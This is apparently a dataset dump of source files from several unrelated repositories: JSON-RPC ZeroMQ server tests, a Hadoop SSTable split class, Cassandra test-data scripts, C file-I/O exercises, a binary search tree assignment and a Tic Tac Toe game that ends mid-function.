"text": "include ../Makefile.credentials\ninclude ../Makefile.deploytemplate\n\nWORKFLOW_NAME=feature-based-molecular-networking\nTOOL_FOLDER_NAME=feature-based-molecular-networking\nWORKFLOW_VERSION=release_14\n" } ]
18
pjkundert/jsonrpc2-zeromq-python
https://github.com/pjkundert/jsonrpc2-zeromq-python
b055fe11b7f8eeab419a7871450b8b993c27a0d9
31099d2320e6c84f9ab71b7ea43747682711ac72
e06884e1a2e46395ddb284c3ced372cf46eed743
refs/heads/master
2021-01-15T15:57:59.940867
2012-01-14T01:51:15
2012-01-14T01:51:15
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6215681433677673, "alphanum_fraction": 0.6282463669776917, "avg_line_length": 30.092308044433594, "blob_id": "3080af563f7709481c2cbda67a2e877788cab5cc", "content_id": "b8c888da498d217527e1e82aa8bf3e017213daf2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4043, "license_type": "no_license", "max_line_length": 81, "num_lines": 130, "path": "/jsonrpc2_zeromq/test/test_server.py", "repo_name": "pjkundert/jsonrpc2-zeromq-python", "src_encoding": "UTF-8", "text": "# Part of the jsonrpc2-zeromq-python project.\n# (c) 2012 Wireless Innovation Ltd, All Rights Reserved.\n# Please see the LICENSE file in the root of this project for license\n# information.\n\nimport unittest\nimport logging\nfrom time import sleep\n\nimport zmq\n\nimport jsonrpc2_zeromq\n\n\nclass RPCTestServer(jsonrpc2_zeromq.RPCServer):\n\n def handle_echo_method(self, msg):\n return msg\n\n def handle_dict_args_method(self, an_int=None, a_bool=None, a_float=None,\n a_str=None):\n return dict(an_int=an_int, a_bool=a_bool, a_float=a_float, a_str=a_str)\n\n\nclass RPCNotificationTestServer(jsonrpc2_zeromq.RPCNotificationServer):\n\n def handle_echo_method(self, msg):\n return msg\n\n\nclass NotificationOnlyPullTestServer(jsonrpc2_zeromq.NotificationOnlyPullServer):\n\n def handle_event_method(self, event_type, event_value):\n # Do things!\n pass\n\n\ntest_debug_logger = logging.getLogger('jsonrpc2_zeromq_test')\ntest_debug_logger.setLevel(logging.DEBUG)\nlogger_console_handler = logging.StreamHandler()\nlogger_console_handler.setLevel(logging.DEBUG)\ntest_debug_logger.addHandler(logger_console_handler)\n\n\nclass BaseServerTestCase(unittest.TestCase):\n\n endpoint = \"inproc://jsonrpc2-zeromq-tests\"\n logger = None\n\n def tearDown(self):\n self.server.stop()\n self.server.join()\n self.server.close()\n sleep(0.1) # Wait for socket to actually close\n\n\nclass RPCServerTestCase(BaseServerTestCase):\n\n def setUp(self):\n self.server = RPCTestServer(endpoint=self.endpoint,\n logger=self.logger)\n self.server.daemon = True\n self.server.start()\n self.client = jsonrpc2_zeromq.RPCClient(endpoint=self.endpoint,\n logger=self.logger)\n\n def test_echo(self):\n msg = \"Test message\"\n result = self.client.echo(msg)\n self.assertEqual(msg, result)\n\n def test_many(self):\n msgs = [\"test lots\", \"and another\", \"me too\"]\n for i, msg in enumerate(msgs):\n result = self.client.echo(msg)\n self.assertEqual(msgs[i], result)\n\n def test_dict_args(self):\n dict_out = dict(an_int=1, a_bool=True, a_float=1.5556, a_str=\"hello!\")\n result = self.client.dict_args(**dict_out)\n self.assertEqual(dict_out, result)\n\n def test_method_not_found(self):\n try:\n self.client.non_existent_method()\n except jsonrpc2_zeromq.MethodNotFound:\n pass\n else:\n self.fail(\"Non-existent method allowed\")\n\n\nclass RPCNotificationServerTestCase(BaseServerTestCase):\n\n def setUp(self):\n self.server = RPCNotificationTestServer(endpoint=self.endpoint,\n logger=self.logger)\n self.server.daemon = True\n self.server.start()\n self.client = jsonrpc2_zeromq.RPCNotifierClient(endpoint=self.endpoint,\n logger=self.logger)\n\n def test_rpc(self, msg=\"clowns and monkeys\"):\n result = self.client.echo(msg)\n self.assertEqual(msg, result)\n\n def test_notify(self):\n self.client.notify.echo(\"a message into the void\")\n\n def test_notify_then_rpc(self):\n self.test_notify()\n self.test_rpc()\n self.test_rpc(\"and lions and tigers\")\n\n\nclass NotificationOnlyPullServerTestCase(BaseServerTestCase):\n\n def setUp(self):\n self.server = NotificationOnlyPullTestServer(endpoint=self.endpoint,\n logger=self.logger)\n self.server.daemon = True\n self.server.start()\n self.client = jsonrpc2_zeromq.NotifierOnlyPushClient(\n endpoint=self.endpoint, logger=self.logger)\n\n def test_event(self):\n self.client.notify.event(\"fell over\", \"quickly\")\n\n def test_many_events(self):\n for i in xrange(100):\n self.client.notify.event(\"balloon launched\", \"number {0}\".format(i))\n\n" } ]
1
tubular/aegisthus
https://github.com/tubular/aegisthus
13aaefdbf2dfead1eb1ffb5dc71ff7ac179a13b2
859f6a10eb5127545ea1ea74ffdba2e7ce1e9dc2
905e8991104721dc7d5c08bc9a37fcf184280275
refs/heads/master
2021-05-30T08:42:11.354392
2016-01-15T22:16:01
2016-01-15T22:16:01
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7214891314506531, "alphanum_fraction": 0.7224316596984863, "avg_line_length": 36.89285659790039, "blob_id": "3dc9c9d88e630a186b8abbd2dc48f95dbb215d03", "content_id": "0873be9c21f5922689ba830709ef23da2f1f07f4", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 2122, "license_type": "permissive", "max_line_length": 147, "num_lines": 56, "path": "/aegisthus-hadoop/src/main/java/com/netflix/aegisthus/input/splits/AegCompressedSplit.java", "repo_name": "tubular/aegisthus", "src_encoding": "UTF-8", "text": "package com.netflix.aegisthus.input.splits;\n\nimport com.netflix.aegisthus.io.sstable.compression.CompressionInputStream;\nimport com.netflix.aegisthus.io.sstable.compression.CompressionMetadata;\nimport org.apache.hadoop.conf.Configuration;\nimport org.apache.hadoop.fs.FSDataInputStream;\nimport org.apache.hadoop.fs.FileSystem;\nimport org.apache.hadoop.fs.Path;\nimport org.slf4j.Logger;\nimport org.slf4j.LoggerFactory;\n\nimport javax.annotation.Nonnull;\nimport java.io.DataInput;\nimport java.io.DataOutput;\nimport java.io.IOException;\nimport java.io.InputStream;\n\npublic class AegCompressedSplit extends AegSplit {\n private static final Logger LOG = LoggerFactory.getLogger(AegCompressedSplit.class);\n protected long dataLength; // Size of decompressed data in bytes\n\n public static AegCompressedSplit createAegCompressedSplit(@Nonnull Path path, long start, long end, long dataLength, @Nonnull String[] hosts) {\n LOG.info(\"Split start: {}, end: {}, Total data size: {}\", start, end, dataLength);\n\n AegCompressedSplit split = new AegCompressedSplit();\n split.path = path;\n split.start = start;\n split.end = end;\n split.hosts = hosts;\n split.dataLength = dataLength;\n return split;\n }\n\n @Nonnull\n @Override\n public InputStream getInput(@Nonnull Configuration conf) throws IOException {\n FileSystem fs = path.getFileSystem(conf);\n FSDataInputStream dataIn = fs.open(path);\n Path metadataPath = new Path(path.getParent(), path.getName().replaceAll(\"-Data.db\", \"-CompressionInfo.db\"));\n FSDataInputStream metadataIn = fs.open(metadataPath);\n CompressionMetadata metadata = new CompressionMetadata(metadataIn, start, end, dataLength);\n return new CompressionInputStream(dataIn, metadata);\n }\n\n @Override\n public void write(@Nonnull DataOutput out) throws IOException {\n super.write(out);\n out.writeLong(dataLength);\n }\n\n @Override\n public void readFields(@Nonnull DataInput in) throws IOException {\n super.readFields(in);\n this.dataLength = in.readLong();\n }\n}\n" }, { "alpha_fraction": 0.5015416145324707, "alphanum_fraction": 0.6022610664367676, "avg_line_length": 45.33333206176758, "blob_id": "4be26afb8bf040fd8c8dadade865cea1c9350bb5", "content_id": "9261fac5379bdd3f2ea601acd203d3232f0ba4a0", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 973, "license_type": "permissive", "max_line_length": 151, "num_lines": 21, "path": "/testing/data_generator.py", "repo_name": "tubular/aegisthus", "src_encoding": "UTF-8", "text": "import cqlsl\nfrom cqlsl.sessions import Session\nfrom cqlsl.statements import insert\nfrom cassandra.cluster import Cluster\nfrom datetime import datetime\n\n\ncluster = Cluster(['127.0.0.1'])\nsession = Session(cluster, keyspace='test')\n\nfields = ('bigint_field', 'boolean_field', 'float_field', 'int_field', 'list_int_field', 'set_text_field', 'map_time_field', 'map_long_field')\ndata = [\n (1, False, 1.32, 54, [1,2], {'a', 'b'}, {'first': datetime(2014, 1, 1, 2, 45), 'second': datetime(2015, 1, 2, 3)}, {'views': long(2.2 * 10 ** 9)}),\n (2, True, 0.4312, 22, None, {'c', 'd'}, {'first': datetime(2014, 2, 1, 2, 45)}, {'views': long(2.5 * 10 ** 9)}),\n (3, True, None, 5123, None, {'a', 'b', 'c'}, None, {'likes': 21}),\n (4, False, 23432.123, 5113, list(), set(), dict(), {'likes': 123123}),\n (5, None, 232.123, 5113, None, None, None, {'shares': 5 * 10 ** 9}),\n]\n\nfor values in data:\n session.execute(insert('test_table').values(**dict(zip(fields, values))))\n" }, { "alpha_fraction": 0.6644295454025269, "alphanum_fraction": 0.6644295454025269, "avg_line_length": 26.090909957885742, "blob_id": "d88ca684a9d8093bea0df176942b453e88914f5e", "content_id": "aa5e50a5c42345f5c6509487d245de33caaa3e7c", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "SQL", "length_bytes": 298, "license_type": "permissive", "max_line_length": 39, "num_lines": 11, "path": "/testing/schema.cql", "repo_name": "tubular/aegisthus", "src_encoding": "UTF-8", "text": "CREATE TABLE test.test_table (\n bigint_field bigint,\n boolean_field boolean,\n float_field float,\n int_field int,\n list_int_field list<int>,\n set_text_field set<text>,\n map_time_field map<text,timestamp>,\n map_long_field map<text,bigint>,\n PRIMARY KEY ((bigint_field))\n);\n" } ]
3
eliotjang/File_Processing
https://github.com/eliotjang/File_Processing
29aa067ccd1563da182e1347a4be7953782343c1
508d9c58242fd9c19d4fbb638ec98a35fa936512
db22613b89083744f98370aa8049066c4fa80747
refs/heads/master
2020-08-20T19:03:37.989980
2020-07-21T04:31:06
2020-07-21T04:31:06
216,056,816
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.46666666865348816, "alphanum_fraction": 0.5061224699020386, "avg_line_length": 14.333333015441895, "blob_id": "0465e06247c2e38a6917646f76b01e8af166a1f8", "content_id": "6c62bbe14f6be2f2d914353ac45b53a4a58f9092", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 789, "license_type": "no_license", "max_line_length": 72, "num_lines": 48, "path": "/eliotjang_project/FileProcessing_chapter4/FileProcessing/create_file.cpp", "repo_name": "eliotjang/File_Processing", "src_encoding": "UHC", "text": "#include <stdio.h>\n#include <string.h>\n\nstruct member {\n\tchar name[10];\n\tint age;\n\tchar sex[3];\n\tchar city[10];\n};\n\nint main()\n{\n\tstruct member m[3];\n\tint i;\n\n\tFILE* f;\n\n\tstrcpy(m[0].name, \"장성원\");\n\tm[0].age = 22;\n\tstrcpy(m[0].sex, \"남\");\n\tstrcpy(m[0].city, \"서울\");\n\n\tstrcpy(m[1].name, \"윤수현\");\n\tm[1].age = 24;\n\tstrcpy(m[1].sex, \"남\");\n\tstrcpy(m[1].city, \"고성\");\n\n\tstrcpy(m[2].name, \"장성혁\");\n\tm[2].age = 24;\n\tstrcpy(m[2].sex, \"남\");\n\tstrcpy(m[2].city, \"서울\");\n\n\tprintf(\"구조체에 입력된 자료\\n\");\n\n\tfor (i = 0; i < 3; i++) {\n\t\tprintf(\"%s %d %s %s\\n\", m[i].name, m[i].age, m[i].sex, m[i].city);\n\t}\n\n\tf = fopen(\"a.txt\", \"w\");\n\n\tfor (i = 0; i < 3; i++) {\n\t\tfprintf(f, \"%s %d %s %s\\n\", m[i].name, m[i].age, m[i].sex, m[i].city);\n\t}\n\n\tfclose(f);\n\n\treturn 0;\n}" }, { "alpha_fraction": 0.5564202070236206, "alphanum_fraction": 0.5836575627326965, "avg_line_length": 14.606060981750488, "blob_id": "7287ac86205fed2bb6d73b2830600777ddf2ae80", "content_id": "230c457eefef8678146153a0e9cef472d6ebddf1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 514, "license_type": "no_license", "max_line_length": 40, "num_lines": 33, "path": "/eliotjang_project/FileProcessing_chapter4/FileProcessing/fgetc.c", "repo_name": "eliotjang/File_Processing", "src_encoding": "UTF-8", "text": "#include <stdio.h>\n#include <stdlib.h> // For exit()\n\nint main()\n{\n\tFILE* fptr1, * fptr2;\n\tchar c;\n\n\tfptr1 = fopen(\"src.txt\", \"r\");\n\tif (fptr1 == NULL) {\n\t\tprintf(\"Cannot open file src.txt\\n\");\n\t\texit(0);\n\t}\n\n\tfptr2 = fopen(\"des.txt\", \"w\");\n\tif (fptr2 == NULL) {\n\t\tprintf(\"Cannot open file des.txt\\n\");\n\t\texit(0);\n\t}\n\n\t// Read contents from file\n\tc = fgetc(fptr1);\n\twhile (c != EOF) {\n\t\tfputc(c, fptr2);\n\t\tc = fgetc(fptr1);\n\t}\n\n\tprintf(\"\\nContents copied to des.txt\");\n\n\tfclose(fptr1);\n\tfclose(fptr2);\n\treturn 0;\n}" }, { "alpha_fraction": 0.5990220308303833, "alphanum_fraction": 0.621026873588562, "avg_line_length": 15.399999618530273, "blob_id": "553038acdf826d372ee7d4dedc066313a1a61ae5", "content_id": "80ade26f88bef0617b9b22bd492eab20a1ba6a86", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 409, "license_type": "no_license", "max_line_length": 45, "num_lines": 25, "path": "/eliotjang_project/FileProcessing_chapter4/FileProcessing/fputc_v2.c", "repo_name": "eliotjang/File_Processing", "src_encoding": "UTF-8", "text": "#include <stdio.h>\n\nint main()\n{\n\tint i = 0;\n\tFILE* streamfile = fopen(\"stream.txt\", \"w\");\n\n\tif (streamfile == NULL)\n\t\treturn 0;\n\n\tchar string[] = \"SMITH\", outputString[20];\n\n\tfor (i = 0; string[i] != '\\0'; i++)\n\t\tfputc(string[i], streamfile);\n\n\tfclose(streamfile);\n\tstreamfile = fopen(\"stream.txt\", \"r\");\n\n\tfgets(outputString, 20, streamfile);\n\n\tprintf(\"%s\", outputString);\n\n\tfclose(streamfile);\n\treturn 0;\n}" }, { "alpha_fraction": 0.6477272510528564, "alphanum_fraction": 0.6499999761581421, "avg_line_length": 9.731707572937012, "blob_id": "3192c9c58caab3b98975b3cbc305390fb462ec28", "content_id": "596e38437db92582b81d65792e1b8a9081cc1d7b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 646, "license_type": "no_license", "max_line_length": 47, "num_lines": 41, "path": "/README.md", "repo_name": "eliotjang/File_Processing", "src_encoding": "UTF-8", "text": "# 파일처리론\n\n컴퓨터공학과 2학년 교과목인 **파일처리론**을 수강하여 배운 내용들을 정리했습니다.\n\n## 활용한 언어\n\n- C\n- Python\n\n## 배운 내용\n\n- 파일의 기본 개념\n- 파일 저장 장치\n- 파일의 입출력 제어\n- 순차 파일\n- 인덱스 구조\n- 인덱스된 순차 파일\n- 직접 파일\n- 다중 키 파일\n- 텍스트를 위한 파일\n\n- - -\n\n# File Processing\n\n## Language\n\n- C\n- Python\n\n## Contents\n\n- Basic concepts of files\n- File storage device\n- I/O control of files\n- Sequential file\n- Index structure\n- Indexed Sequential Files\n- Direct Files\n- Multi-key file\n- Files for Text\n" }, { "alpha_fraction": 0.4590570628643036, "alphanum_fraction": 0.4863523542881012, "avg_line_length": 13.428571701049805, "blob_id": "ed8b254f65510bc96c7709b0edcd4265217c9314", "content_id": "06b3631ccc79b22ddee80a1b445b9d1304f6c65d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 403, "license_type": "no_license", "max_line_length": 70, "num_lines": 28, "path": "/eliotjang_project/FileProcessing_chapter4/FileProcessing/read_file.c", "repo_name": "eliotjang/File_Processing", "src_encoding": "UTF-8", "text": "#include <stdio.h>\n\nstruct member {\n\tchar name[10];\n\tint age;\n\tchar sex[3];\n\tchar city[10];\n};\n\nint main()\n{\n\tstruct member m[3];\n\tint i;\n\tFILE* f;\n\n\tf = fopen(\"a.txt\", \"r\");\n\n\tfor (i = 0; i < 3; i++) {\n\t\tfscanf(f, \"%s %d %s %s\", m[i].name, &m[i].age, m[i].sex, m[i].city);\n\t}\n\tfclose(f);\n\t\n\tfor (i = 0; i < 3; i++) {\n\t\tprintf(\"%s %d %s %s\\n\", m[i].name, m[i].age, m[i].sex, m[i].city);\n\t}\n\n\treturn 0;\n}" }, { "alpha_fraction": 0.5639204382896423, "alphanum_fraction": 0.5707386136054993, "avg_line_length": 33.861385345458984, "blob_id": "73427e51090092327ce071691233ef0fe0662419", "content_id": "4755d3a573d956a153110373ab80edc2f9d8a307", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4768, "license_type": "no_license", "max_line_length": 102, "num_lines": 101, "path": "/Assignment/for BST/BinarySearchTreeV2.py", "repo_name": "eliotjang/File_Processing", "src_encoding": "UTF-8", "text": "'''\nAuthor: Eliot Jang(장성원)\nlast_modified_at: 2019-11-11\n'''\n\n#인자로 받은 data를 인스턴스 data에 저장하고 left,right변수를 초기화하는 class 생성\nclass Node(object):\n def __init__(self, data):\n self.data = data\n self.left = self.right = None\n\n#이원탐색트리 class 생성\nclass BinarySearchTree(object):\n #인스턴스 root node를 초기화\n def __init__(self):\n self.root = None\n #해당 data를 bst 인스턴스 root에 삽입\n def insert(self, data):\n self.root = self._insert_value(self.root, data)\n # root node에 어떠한 값이 있다면 True 반환\n return self.root is not None\n\n def _insert_value(self, node, data):\n #root node에 아무런 값도 없다면 nonde 인스턴스에 data를 그대로 삽입\n if node is None:\n node = Node(data)\n else:\n #해당 node의 데이터가 입력받은 data보다 작다면 \n if data <= node.data:\n #child tree인 왼쪽 트리로 가는 node 인스턴스의 left변수와 해당 data를 인자로 넣는 재귀함수 호출\n node.left = self._insert_value(node.left, data)\n else:\n #child tree인 오른쪽 트리로 가는 node 인스턴스의 right변수와 해당 data를 인자로 넣는 재귀함수 호출\n node.right = self._insert_value(node.right, data)\n #node가 만들어졌다면 해당 node 인스턴스를 반환\n return node\n #해당 데이터인 key와 새롭게 만든 result배열을 인자로 받아 find 메소드 생성\n def find(self, key, result):\n #해당 데이터가 어디 있는지 찾아주는 메소드를 호출하여 반환\n return self._find_value(self.root, key, result)\n #해당 node와 key 그리고 새롭게 만든 result배열을 인자로 받은 _find_value 메소드 생성\n def _find_value(self, root, key, result):\n #root node가 없거나 root node의 data가 입력받은 data인 key와 일치한다면\n if root is None or root.data == key:\n #해당 데이터 출력\n print(\"\\n해당 배열의 데이터는\", root.data,\"\\n데이터에 해당하는 배열의 첨자는 \",end='')\n #데이터에 해당하는 배열의 첨자 출력후 반환\n return result.index(root.data)\n #찾고자 하는 data인 key가 root node보다 작다면\n elif key < root.data:\n #root 인스턴스의 child tree인 왼쪽으로 가는 트리인 left 변수, 해당 data인 key, 새롭게 만든 result 배열의 인자로 재귀함수 호출\n return self._find_value(root.left, key, result)\n else:\n #root 인스턴스의 child tree인 오른쪽으로 가는 트리인 right 변수, 해당 data인 key, 새롭게 만든 result 배열의 인자로 재귀함수 호출\n return self._find_value(root.right, key, result)\n #왼쪽 하위 트리를 모두 방문하고 root를 방문하고 마지막으로 오른쪽 하위 트리를 모두 방문하여 오름차순으로 정렬하는 중위순회 메소드 생성\n def in_order_traversal(self, result):\n #중위순회 메소드 구현\n def _in_order_traversal(root, result):\n #root node가 null값이라면\n if root is None:\n #그대로 진행\n pass\n else:\n #root node가 null값이 아니라면 왼쪽 서브트리를 방문\n _in_order_traversal(root.left,result)\n #result 배열에 data 추가\n result.append(root.data)\n #배열의 첨자와 data값 출력\n print('[',array.index(root.data),']', root.data)\n #root node의 오른쪽 서브 트리 방문\n _in_order_traversal(root.right,result)\n #root node 자기 자신을 순회\n _in_order_traversal(self.root,result)\n\nif __name__ == '__main__':\n #초기 데이터 값\n array = [15, 11, 70, 5, 13, 50, 18, 30, 1]\n #최종 결과를 넣는 배열 초기화\n result = []\n\n print(\"초기 배열\")\n print(array)\n #이원탐색트리 메소드 호출\n bst = BinarySearchTree()\n #데이터 값을 이원탐색트리에 삽입\n for x in array:\n bst.insert(x)\n\n print(\"\\n초기 배열이 이원탐색트리에 의해 정렬 되는 과정\")\n bst.in_order_traversal(result)\n\n print(\"\\n이원탐색트리를 적용한 새로운 배열\")\n print(result)\n for a in result:\n print('[',result.index(a),']',a)\n\n while True:\n x = input(\"\\n검색하고자하는 데이터를 입력하세요\")\n int_x = int(x)\n print(bst.find(int_x,result))" }, { "alpha_fraction": 0.5235294103622437, "alphanum_fraction": 0.550000011920929, "avg_line_length": 16.947368621826172, "blob_id": "e9eeb688218dbc8fb24ac16433530de98ecb2ed6", "content_id": "aaeb3c07cb1f0cdd8d36d6418c09317f88d4d0c4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 382, "license_type": "no_license", "max_line_length": 52, "num_lines": 19, "path": "/eliotjang_project/FileProcessing_chapter4/FileProcessing/fputc.c", "repo_name": "eliotjang/File_Processing", "src_encoding": "UHC", "text": "#include <stdio.h>\nint main() {\n\tFILE* fp1, * fp2;\n\n\tif ((fp1 = fopen(\"test.txt\", \"w\")) == NULL) {\n\t\tprintf(\"file open error!\\n\");\n\t\treturn 0;\n\t}\n\n\tfputs(\"Hello, everyone \\n 첫번째 파일 오픈 테스트임 \\n\", fp1);\n\n\tif ((fp2 = fopen(\"test.txt\", \"a\")) == NULL) {\n\t\tprintf(\"file open error!\\n\");\n\t\treturn 0;\n\t}\n\n\tfputs(\"두 번째 파일 오픈 테스트?\", fp2);\n\treturn 0;\n}" } ]
7
silviappendino/CODE-IN-PLACE
https://github.com/silviappendino/CODE-IN-PLACE
ade52e703acfe066d6b82a3e81114de1fdfa0c20
678b68ab5ee016be44caa3ee694be45c7e767f82
f207e273b2c7bb771c50a46a8c205f6ee81ca018
refs/heads/master
2023-06-20T20:06:58.574816
2021-07-22T14:39:59
2021-07-22T14:39:59
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5177842378616333, "alphanum_fraction": 0.532069981098175, "avg_line_length": 36.97047805786133, "blob_id": "d77c22a4afa677a59456c2114b6a21403418e671", "content_id": "0515a6303f33d60928af2b1b01e710fd4ca1fd17", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10291, "license_type": "no_license", "max_line_length": 131, "num_lines": 271, "path": "/main.py", "repo_name": "silviappendino/CODE-IN-PLACE", "src_encoding": "UTF-8", "text": "# Players Object\nclass player:\n def __init__(self, name):\n self.name = name\n\n def get_best_score(self, name):\n self.file = name + '.txt'\n if os.path.isfile(self.file): #module qui verifie que le file existe. Si oui, read, sinon return 0\n _playerFile = open(self.file, 'r') #r serve per poter leggere\n return float(_playerFile.read())\n _playerFile.close()\n else:\n return 0\n\n def save_best_score(self, nowscore):\n self.nowscore = str(nowscore)\n _playerFile = open(self.file, 'w') #mode Write et ça le vide pour ecrire nouveau record\n _playerFile.write(self.nowscore)\n _playerFile.close()\n\n#ask player name\ndef ask_player_name(n):\n _player = \"\"\n while len(_player) == 0:\n _player = input(\"\\nPlayer \" + n + \" enter your name: \")\n return _player\n\n#ask level (E or D)\ndef ask_level():\n _level = \"\"\n while _level.upper() != \"E\" and _level.upper() != \"D\":\n _level=input(\"\\nThere are 2 levels of difficulty: \\n \\nE is Easy \\nD is difficult \\n \\nThe level chosen is \")\n return _level.upper()\n\n# print board with available numbers\ndef game_board():\n print(\"\\t | |\")\n print(\"\\t {} | {} | {}\".format(gameboard[0], gameboard[1], gameboard[2]))\n print('\\t_____|_____|_____')\n print(\"\\t | |\")\n print(\"\\t {} | {} | {}\".format(gameboard[3], gameboard[4], gameboard[5]))\n print('\\t_____|_____|_____')\n print(\"\\t | |\")\n print(\"\\t {} | {} | {}\".format(gameboard[6], gameboard[7], gameboard[8]))\n print(\"\\t | | \\n\")\n\n#Tic Tac Toe game\n# check if number input is still available\ndef check_shot(number, number_list):\n if number > 9 or number < 1:\n return \"ko\"\n if number in number_list:\n return \"ok\"\n return \"ko\"\n\n#Tic Tac Toe game\n# check if number input is still available\ndef get_first_free(number_list):\n for n in range(0, 10):\n if n in number_list:\n return n\n\n#Tic Tac Toe game\ndef check_winner(win_sol_all, player_list):\n # check if there i a win line\n for nSerie in range(0, len(win_sol_all)):\n result = all(elem in player_list for elem in win_sol_all[nSerie])\n if result:\n return True\n return False\n\n#Tic Tac Toe game\ndef check_2_of_3(all_serie_of_3, player_list, number_list):\n # check if there 2 elem in winSol_n, and return the third one... if available\n if len(player_list) != 2:\n return False\n for nSerie in range(0, len(all_serie_of_3)):\n if (player_list[0] in all_serie_of_3[nSerie]) and (player_list[1] in all_serie_of_3[nSerie]):\n w_list = all_serie_of_3[nSerie] # wList = winSol_n with 2 of 3 ok\n for n in range(0, 3):\n if player_list[0] != w_list[n] and player_list[1] != w_list[n]:\n w_num = w_list[n] # wNum = third (missing) num in winSol_n\n if check_shot(w_num, number_list) == \"ok\":\n return w_num\n return 0\n\n# init data\ngameboard = [1, 2, 3, 4, 5, 6, 7, 8, 9]\nshots_list_player_X= []\nshots_list_player_O= []\nwin_sol_1 = [1, 2, 3]\nwin_sol_2 = [4, 5, 6]\nwin_sol_3 = [7, 8, 9]\nwin_sol_4 = [1, 4, 7]\nwin_sol_5 = [2, 5, 8]\nwin_sol_6 = [3, 6, 9]\nwin_sol_7 = [1, 5, 9]\nwin_sol_8 = [3, 5, 7]\nwin_sol_all = [win_sol_1, win_sol_2, win_sol_3, win_sol_4, win_sol_5, win_sol_6, win_sol_7, win_sol_8]\n\n#Game Difficult\ndef game_1player_D(_name_player_X): # against the PC\n _tot_time_player_X = 0\n _the_winner_is = \"nobody\"\n\n for n_play in range(1, 6):\n # player X is playing...\n # print(\" \")\n x = game_board()\n clock = datetime.datetime.now().timestamp()\n shot_player_X = int(input(_name_player_X + \" enter a cell number within the range (1-9): \"))\n shot_ok = check_shot(shot_player_X, gameboard)\n while shot_ok != \"ok\":\n x = game_board()\n shot_player_X = int(input(str(\n shot_player_X) + \" was already played or is not valid. Please enter another cell number within the range (1-9): \"))\n shot_ok = check_shot(shot_player_X, gameboard)\n\n # stop time for playerX and cumul time\n _tot_time_player_X += (datetime.datetime.now().timestamp() - clock)\n # update board and shots played by Player X\n print(\" \")\n gameboard[shot_player_X - 1] = \"x\"\n shots_list_player_X.append(shot_player_X)\n\n # check if player X is the winner\n if check_winner(win_sol_all, shots_list_player_X):\n print(_name_player_X + \" YOU WIN!\", \"\\n\")\n _the_winner_is = \"X\"\n break\n\n # \"PC\" is playing...\n if n_play < 5:\n if n_play == 1: # 1st shot = 5 or first availaible\n shot_player_O = 5\n if check_shot(5, gameboard) == \"ok\":\n shot_player_O = 5\n else:\n shot_player_O = get_first_free(gameboard)\n else:\n shot_player_O = check_2_of_3(win_sol_all, shots_list_player_X,\n gameboard) # defending!! stop player X choosing the 3rd of winSol\n if shot_player_O == 0:\n shot_player_O = check_2_of_3(win_sol_all, shots_list_player_O,\n gameboard) # attacking!! search 3rd of winSol in PC shotslist\n if shot_player_O == 0:\n shot_player_O = get_first_free(gameboard)\n\n # update board and shots played by Player X\n gameboard[shot_player_O - 1] = \"o\"\n shots_list_player_O.append(shot_player_O)\n print(\" \")\n print(\"PC has played... \\n \")\n\n # check if PC is the winner\n if check_winner(win_sol_all, shots_list_player_O):\n _the_winner_is = \"_PC\"\n break\n return [_tot_time_player_X, 0, _the_winner_is]\n\n#Game Easy\ndef game_1player_E(_name_player_X): # against the PC\n _tot_time_player_X = 0\n # _totTimePlayerO = 0\n _the_winner_is = \"nobody\"\n\n for n_play in range(1, 6):\n # player X is playing...\n # print(\" \")\n x = game_board()\n clock = datetime.datetime.now().timestamp()\n shot_player_X = int(input(_name_player_X + \" enter a cell number within the range (1-9): \"))\n shot_ok = check_shot(shot_player_X, gameboard)\n while shot_ok != \"ok\":\n # print(\" \")\n x = game_board()\n shot_player_X = int(input(str(\n shot_player_X) + \" was already played or is not valid. Please enter another cell number within the range (1-9): \"))\n shot_ok = check_shot(shot_player_X, gameboard)\n\n # stop time for playerX and cumul time\n _tot_time_player_X += (datetime.datetime.now().timestamp() - clock)\n # update board and shots played by Player X\n print(\" \")\n gameboard[shot_player_X - 1] = \"x\"\n shots_list_player_X.append(shot_player_X)\n\n # check if player X is the winner\n if check_winner(win_sol_all, shots_list_player_X):\n print(_name_player_X+ \" YOU WIN!\", \"\\n\")\n _the_winner_is = \"X\"\n break\n\n # \"PC\" is playing...\n if n_play < 5:\n #shotPlayerO = getFirstFree(GameBoard)\n shot_player_O = random.randrange(10)\n while check_shot(shot_player_O, gameboard) != \"ok\":\n shot_player_O = random.randrange(10)\n\n # update board and shots played by Player X\n gameboard[shot_player_O - 1] = \"o\"\n shots_list_player_O.append(shot_player_O)\n print(\" \")\n print(\"PC has played... \\n \")\n\n # check if PC is the winner\n if check_winner(win_sol_all, shots_list_player_O):\n _the_winner_is = \"_PC\"\n break\n return [_tot_time_player_X, 0, _the_winner_is]\n\ndef display_final_result(_the_winner_is, _name_player_X, _tot_time_player_X, _tot_time_player_O):\n x = game_board()\n\n if _the_winner_is == \"X\":\n ##create Objet to manage the file of player with bestscore\n player_X = player(_name_player_X)\n best_score_X = player_X.get_best_score(_name_player_X)\n print(_name_player_X + \" won in \" + str(_tot_time_player_X) + \" seconds\")\n print(\"\\n\" + _name_player_X + \"'s last best time was \" + str(best_score_X))\n if best_score_X == 0 or str(_tot_time_player_X) < str(best_score_X):\n print(\"\\n\" + _name_player_X + \"'s new best time is \" + str(_tot_time_player_X))\n player_X.save_best_score(str(_tot_time_player_X))\n\n elif _the_winner_is == \"_PC\":\n print(_name_player_X + \" YOU LOST!\")\n\n else:\n print(\"NO WINNER... 